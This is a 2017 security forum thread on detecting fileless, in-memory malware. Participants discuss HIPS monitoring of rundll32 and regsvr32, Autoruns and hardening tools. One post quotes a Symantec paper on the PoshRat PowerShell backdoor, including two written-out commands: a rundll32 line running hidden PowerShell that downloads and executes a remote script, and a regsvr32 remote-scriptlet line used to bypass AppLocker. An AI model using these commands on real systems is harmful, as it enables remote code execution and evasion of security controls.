In memory fileless malwar edetection ..... any antimalware software?

itman · Feb 24, 2017

This one definitely worth a read: https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/increased-use-of-powershell-in-attacks-16-en.pdf

BACK DOOR TROJANS

PoshRat is a simple PowerShell back door Trojan. There are a handful of variations, which each consist of 100-200 lines of PowerShell code. PoshRat dynamically creates a Transport Layer Security (TLS) certificate that can be used to encrypt communications. Once executed, the malware listens on TCP ports 80 and 443 for incoming connections. The backend communication is performed with Net.Webclient using the DownloadString method. The threat executes commands with Invoke-Expression.

Such shells are integrated in the most common attack frameworks, for example, the Nishang package. In addition to the back door server, the frameworks provide load point methods to execute the payload. One method is to use rundll32 to start a JavaScript which will then execute a PowerShell command line.

rundll32.exe javascript:”\..\
mshtml,RunHTMLApplication “;document.write();r=new%20
ActiveXObject(“WScript.Shell”).run(“powershell -w h
-nologo -noprofile -ep bypass IEX ((New-Object Net.
WebClient).DownloadString(‘[IP ADDRESS]/script.
ps1’))”,0,true);

Another option is to generate a COM scriptlet (.sct) file containing a script. The script is triggered with the following regsvr32 command on the infected computer:

regsvr32.exe /u /n /s /i:http://[IP ADDRESS]:80/file.
sct scrobj.dll

This method can be used to bypass AppLocker restrictions. The command will load the remote script in the register element and
run the script.
Click to expand...

Rasheed187 · Feb 25, 2017

itman said: ↑

This one definitely worth a read: https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/increased-use-of-powershell-in-attacks-16-en.pdf
Click to expand...

Will do some reading. BTW, this is a new tool that will disable a couple of things. Nothing special, but might come in handy:

https://github.com/securitywithoutborders/hardentools

Rasheed187 · Feb 25, 2017

WildByDesign said: ↑

Chromium is already planning to take advantage of many of these built-in OS process mitigations and any other software developers can do the same with their programs. A lot of these mitigations are specific to Windows 10 though. I don't think that Microsoft gets nearly enough credit lately with regard to lowering attack surface.
Click to expand...

OK I see. But I was talking about apps that are trying to launch system tools, in EXE Radar this is called "vulnerable processes". So this hasn't got anything to do with blocking exploits. I believe it's only common for apps to launch rundll32 and regsvr32, and it's best to monitor these system tools with HIPS. And for example, if apps launch explorer or svchost, you should already know they might be trying to perform process hollowing.

itman · Feb 25, 2017

Also quoted in the Symantec article is a Blackhat article about WMI malware I am posting here separately: https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent Asynchronous-And-Fileless-Backdoor-wp.pdf

Although it is very difficult to stop WMI based malware, it can be detected by use of Autoruns.

Log in or Sign up

In memory fileless malwar edetection ..... any antimalware software?

itman Registered Member

Rasheed187 Registered Member

Rasheed187 Registered Member

itman Registered Member

Log in or Sign up

In memory fileless malwar edetection ..... any antimalware software?

itman Registered Member

Rasheed187 Registered Member

Rasheed187 Registered Member

itman Registered Member

Useful Searches